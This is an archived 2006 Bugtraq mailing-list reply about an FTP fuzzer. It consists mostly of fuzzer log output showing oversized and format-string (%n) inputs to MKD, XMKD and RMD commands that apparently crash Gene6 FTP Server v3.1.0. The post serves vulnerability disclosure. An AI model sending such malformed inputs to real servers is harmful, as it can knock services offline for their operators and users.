lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Wed, 03 May 2006 17:41:08 +0800
From: Alexey Biznya <biakus@....ru>
To: infocus <infocus@...igo.hr>
Cc: bugtraq@...urityfocus.com
Subject: Re: FTP Fuzzer


infocus wrote:
> Hi,
>
> We have released simple and user friendly GUI FTP fuzzer tool for stress
> testing FTP server implementations. It is quite configurable tool, which
> means that you can precisely define which FTP commands will be fuzzed
> with the parameter size and test strings.
>
> Running this fuzzer against FTP server implementations resulted in
> uncovering numerous security vulnerabilities (overflows, format strings) 
> in various FTP servers. After short period of fuzzing, fuzzer revealed 
> buffer overflow vulnerabilities in for example:
>
> - ArgoSoft FTP Server (RNTO Unicode overflow)
> - Golden FTP Server (NLST overflow)
> - FileZilla FTP Server (MLSD)
> - FileZilla remote server interface (homemade protocol)
> - WarFTPD (various exceptions and WDM.exe overflow)
>
> You can download it from:
> http://www.infigo.hr/files/ftpfuzz.zip
>
>
>   

220 Gene6 FTP Server v3.1.0  (Build 70) ready...

[ USER: [test] ]
[ PASS: [test] ]
[ CMD: [MKD]    FUZZ: [~A/~A/~A/~A/~A/~A/~A]    SIZE: 3000 ]
[ Connecting to x.x.x.x:21... ]
[ ERROR: Cannot connect to target!!!         ][ SERVER IS MAYBE DEAD 
BECAUSE OF FUZZING!!! ]

[ USER: [test] ]
[ PASS: [test] ]
[ CMD: [MKD]    FUZZ: [~/~/~/~/~/~/~/~/~/~/]    SIZE: 6300 ]
[ Connecting to x.x.x.x:21... ]
[ ERROR: Cannot connect to target!!!         ][ SERVER IS MAYBE DEAD 
BECAUSE OF FUZZING!!! ]

[ USER: [test] ]
[ PASS: [test] ]
[ CMD: [MKD]    FUZZ: [,~/,~/,~/,~/,~/,~/,~]    SIZE: 6300 ]
[ Connecting to x.x.x.x:21... ]
[ Connected, starting fuzz process... ]
[ USER: [test] ]
[ PASS: [test] ]
[ CMD: [MKD]    FUZZ: [,~/,~/,~/,~/,~/,~/,~]    SIZE: 7300 ]
[ Connecting to x.x.x.x:21... ]
[ ERROR: Cannot connect to target!!!         ][ SERVER IS MAYBE DEAD 
BECAUSE OF FUZZING!!! ]

[ USER: [test] ]
[ PASS: [test] ]
[ CMD: [MKD]    FUZZ: [/A~%n/A~%n/A~%n/A~%n]    SIZE: 7300 ]
[ Connecting to x.x.x.x:21... ]
[ ERROR: Cannot connect to target!!!         ][ SERVER IS MAYBE DEAD 
BECAUSE OF FUZZING!!! ]

[ USER: [test] ]
[ PASS: [test] ]
[ CMD: [MKD]    FUZZ: [~1/~1/~1/~1/~1/~1/~1]    SIZE: 6300 ]
[ Connecting to x.x.x.x:21... ]
[ ERROR: Cannot connect to target!!!         ][ SERVER IS MAYBE DEAD 
BECAUSE OF FUZZING!!! ]

[ USER: [test] ]
331 Password required for test.

[ PASS: [test] ]
[ CMD: [RMD]    FUZZ: [
 
 
 
 
 
 
]    SIZE: 200000 ]

[ CMD: [XMKD]    FUZZ: [~A/~A/~A/~A/~A/~A/~A]    SIZE: 1400 ]
RECV: 550 
"~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~A/~
[ CMD: [XMKD]    FUZZ: [~A/~A/~A/~A/~A/~A/~A]    SIZE: 2300 ]
RECV: 501 An error occured, the administrator was notified.

[ CMD: [XMKD]    FUZZ: [~A/~A/~A/~A/~A/~A/~A]    SIZE: 3000 ]
[ Connecting to x.x.x.x:21... ]
[ ERROR: Cannot connect to target!!!         ][ SERVER IS MAYBE DEAD 
BECAUSE OF FUZZING!!! ]

[ USER: [test] ]
[ PASS: [test] ]
[ CMD: [XRMD]    FUZZ: [~A/~A/~A/~A/~A/~A/~A]    SIZE: 4700 ]
[ Connecting to x.x.x.x:21... ]
[ ERROR: Cannot connect to target!!!         ][ SERVER IS MAYBE DEAD 
BECAUSE OF FUZZING!!! ]



-- 

tester

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ